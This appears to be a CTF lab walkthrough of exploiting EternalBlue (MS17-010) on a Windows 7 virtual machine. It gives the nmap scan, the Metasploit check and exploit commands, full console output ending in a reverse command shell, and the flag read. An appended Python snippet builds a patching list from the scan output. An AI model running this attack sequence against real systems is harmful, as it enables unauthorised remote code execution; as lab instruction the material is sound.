EternalBlue Test

EternalBlue vulnerability exploitation test

1. Get the local IP address

root@Kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.230.133 netmask 255.255.255.0 broadcast 192.168.230.255
inet6 fe80::20c:29ff:fefb:93e6 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:fb:93:e6 txqueuelen 1000 (Ethernet)
RX packets 3097 bytes 219626 (214.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11461 bytes 1123362 (1.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000

The local IP is 192.168.230.133.

2. Scan the other hosts on the LAN

root@Kali:~# nmap 192.168.230.133/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 11:44 EDT

......

Nmap scan report for promote.cache-dns.local (192.168.230.134)
Host is up (0.00027s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcp open icslap
5357/tcp open wsdapi
10243/tcp open unknown
MAC Address: 00:0C:29:68:FF:4F (VMware)

......

You can see that host 192.168.230.134 has port 445 open, so we can consider attacking it with the EternalBlue vulnerability.

3. Attack the target host with the Metasploit Framework EternalBlue payload

First verify whether the target is exploitable.

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.230.134:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.230.134:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The output indicates that the host can likely be attacked via the MS17-010 vulnerability (EternalBlue), so run the exploit.

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.230.133:4444
[+] 192.168.230.134:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.230.134:445 - Connecting to target for exploitation.
[+] 192.168.230.134:445 - Connection established for exploitation.
[+] 192.168.230.134:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.230.134:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.230.134:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.230.134:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.230.134:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.230.134:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.230.134:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.230.134:445 - Sending all but last fragment of exploit packet
[*] 192.168.230.134:445 - Starting non-paged pool grooming
[+] 192.168.230.134:445 - Sending SMBv2 buffers
[+] 192.168.230.134:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.230.134:445 - Sending final SMBv2 buffers.
[*] 192.168.230.134:445 - Sending last fragment of exploit packet!
[*] 192.168.230.134:445 - Receiving response from exploit packet
[+] 192.168.230.134:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.230.134:445 - Sending egg to corrupted connection.
[*] 192.168.230.134:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.230.133:4444 -> 192.168.230.134:49164) at 2019-09-22 11:49:08 -0400
[+] 192.168.230.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.230.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.230.134:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>

You can see that a Windows cmd shell was returned, which means the attack succeeded; in a CTF you can now read the flag file.

C:\Windows\system32>type C:\Users\Mask\Desktop\flag.txt
type C:\Users\Mask\Desktop\flag.txt
flag{Njust_Tp0t_Welcome}
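As an added example (not part of the original post), the following Python turns the nmap report from step 2 and the smb_ms17_010 scanner lines from step 3 into a remediation worklist: hosts exposing 445/tcp, and those the check flagged as likely vulnerable. The sample inputs are constructed, modelled on the output shown above.

```python
import re

# Constructed sample in nmap's normal output format, modelled on the scan in step 2.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.230.133
PORT    STATE SERVICE
22/tcp  open  ssh
445/tcp closed microsoft-ds

Nmap scan report for promote.cache-dns.local (192.168.230.134)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
MAC Address: 00:0C:29:68:FF:4F (VMware)
"""

# Constructed sample of the smb_ms17_010 scanner's console lines from step 3.
SAMPLE_MSF = """\
[+] 192.168.230.134:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.230.134:445 - Scanned 1 of 1 hosts (100% complete)
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+(?:\.\d+){3})\)?$")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+(\S+)\s+\S+")
MSF_RE = re.compile(r"^\[\+\] (\d+(?:\.\d+){3}):445 - Host is likely VULNERABLE to MS17-010!")

def parse_open_ports(nmap_text):
    """Map each reported IP to the sorted list of its open ports."""
    hosts, current = {}, None
    for line in nmap_text.splitlines():
        line = line.strip()
        host = HOST_RE.match(line)
        if host:                      # a new per-host report block starts here
            current = host.group(1)
            hosts[current] = []
            continue
        port = PORT_RE.match(line)
        if port and current and port.group(2) == "open":
            hosts[current].append(int(port.group(1)))
    return {ip: sorted(ports) for ip, ports in hosts.items()}

def smb_exposed_hosts(nmap_text):
    """Hosts exposing 445/tcp: the candidates to patch, or to firewall if they cannot be."""
    return sorted(ip for ip, ports in parse_open_ports(nmap_text).items() if 445 in ports)

def flagged_vulnerable(msf_text):
    """IPs the smb_ms17_010 check flagged, for cross-checking against the exposure list."""
    return sorted({m.group(1) for m in map(MSF_RE.match, msf_text.splitlines()) if m})
```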
